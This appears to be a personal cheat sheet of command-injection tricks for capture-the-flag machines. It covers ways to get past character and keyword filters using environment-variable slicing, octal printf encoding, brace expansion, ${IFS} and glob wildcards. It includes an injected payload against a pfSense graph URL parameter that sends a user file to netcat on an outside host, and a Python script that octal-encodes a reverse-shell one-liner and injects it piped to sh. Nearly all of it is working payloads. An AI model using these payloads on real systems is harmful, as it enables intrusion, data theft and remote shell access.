> env
HOME=/
LANG=en_US.ISO8559-1
cat ${HOME} ..slash
cat ${LANG:14:1} ..dash (wont work in bsd/pfsense)
LFI Example:
..queues;cat+${HOME}home${HOME}rohit${HOME}user.txt|nc+10.10.14.6+4444
nc -nvlp 4444
man ascii .. ascii table
printf "\x41" .. Hex Char = A
man ascii .. find octal in ascii table
printf "\56" .. period
printf "\55" .. dash
Example:
echo $(printf "\55") .. result: -
wc -c /home/user.txt
wc+$(printf+"\55")c+/home/user.txt
Send to nc
..queues;wc+$(printf+"\55")c+${HOME}home${HOME}rohit${HOME}user.txt|nc+10.10.14.6+9000
nc -nvlp 9001
#!/usr/bin/env python3
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
payload += ("\\" + oct(ord(char)).lstrip("0o"))
print(payload)
\160\171\164\150\... ..result
printf '\160\171\164\150\...' ..verify
Inject:
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh
{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt
/&pwd/&pwd
/var/task&{cat,secret.py}
{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}
Found this hiding behind ... instead of . ..
{/var/task/...,-la}
Avoid 'root' Filter with Splatting
----------------
Root Blocked
echo 'hello' > /tmp/root ..decode/unzip/cat ..fail
echo 'hello' > /tmp/*r00t ..decode/unzip/cat ..success
----------------
Splatting:
.backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt ..success
myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded
